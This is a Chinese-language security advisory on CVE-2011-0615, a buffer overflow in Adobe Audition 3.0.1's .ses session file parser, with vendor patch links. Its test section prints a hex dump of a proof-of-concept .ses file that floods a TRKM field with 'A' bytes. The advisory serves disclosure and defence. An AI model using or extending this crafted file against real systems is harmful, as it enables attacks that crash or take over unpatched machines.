首页 -> 安全研究
安全研究
安全漏洞
Adobe Audition '.ses'缓冲区溢出漏洞(CVE-2011-0615)
发布日期:2011-05-12
更新日期:2011-05-11
受影响系统:
Adobe Audition 3.0.1描述:
BUGTRAQ ID: 47838
CVE(CAN) ID: CVE-2011-0615
Adobe Audition是一个专业音频编辑和混合环境,原名为Cool Edit Pro,被Adobe收购后改名为Adobe Audition。
Adobe Audition 3.0.1版本的".ses"在实现上存在缓冲区溢出漏洞,通过.ses文件的TRKM块里的某些字段内的特制数据,远程攻击者可利用此漏洞在受影响系统上执行任意代码。
<*来源:Diego Juarez
Eduardo Koch
Laura Balian
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
00000010: 48 A3 00 00-01 00 00 00-07 00 00 00-02 00 00 00 H? ? ? ?
00000020: 0B 00 00 00-41 00 75 00-64 00 69 00-6F 00 54 00 ? A u d i o T
00000030: 72 00 61 00-63 00 6B 00-00 00 1E A3-00 00 10 27 r a c k ?? ?'
00000040: 00 00 07 00-00 00 4D 00-61 00 73 00-74 00 65 00 ? M a s t e
00000050: 72 00 00 00-00 00 00 00-00 00 00 00-00 00 30 00 r 0
00000060: 01 00 00 00-00 00 01 00-00 00 00 00-01 00 00 00 ? ? ?
00000070: 20 4E 00 00-01 00 00 00-20 00 00 00-40 1F 00 00 N ? @?
00000080: 02 00 00 00-1B 00 00 00-41 00 75 00-64 00 69 00 ? ? A u d i
00000090: 74 00 69 00-6F 00 6E 00-20 00 33 00-2E 00 30 00 t i o n 3 . 0
000000A0: 20 00 57 00-69 00 6E 00-64 00 6F 00-77 00 73 00 W i n d o w s
000000B0: 20 00 53 00-6F 00 75 00-6E 00 64 00-00 00 05 00 S o u n d ?
000000C0: 00 00 0C 00-00 00 41 00-75 00 64 00-69 00 6F 00 ? A u d i o
000000D0: 20 00 49 00-6E 00 70 00-75 00 74 00-00 00 1B 00 I n p u t ?
000000E0: 00 00 41 00-75 00 64 00-69 00 74 00-69 00 6F 00 A u d i t i o
000000F0: 6E 00 20 00-33 00 2E 00-30 00 20 00-57 00 69 00 n 3 . 0 W i
00000100: 6E 00 64 00-6F 00 77 00-73 00 20 00-53 00 6F 00 n d o w s S o
00000110: 75 00 6E 00-64 00 00 00-FF FF FF FF-0D 00 00 00 u n d ?
00000120: 41 00 75 00-64 00 69 00-6F 00 20 00-4F 00 75 00 A u d i o O u
00000130: 74 00 70 00-75 00 74 00-00 00 00 00-00 00 01 00 t p u t ?
00000140: 00 00 00 00-00 00 00 00-00 00 00 00-00 00 40 00 @
00000150: 00 00 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAA
00000160: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA
00000170: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA
00000180: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA
00000190: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA
000001A0: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA
000001B0: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA
000001C0: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA
000001D0: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA
000001E0: 41 - - - A
建议:
厂商补丁:
Adobe
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.adobe.com/support/security/
http://www.adobe.com/support/security/bulletins/apsb11-10.html
浏览次数:1686
严重程度:0(网友投票)
绿盟科技给您安全的保障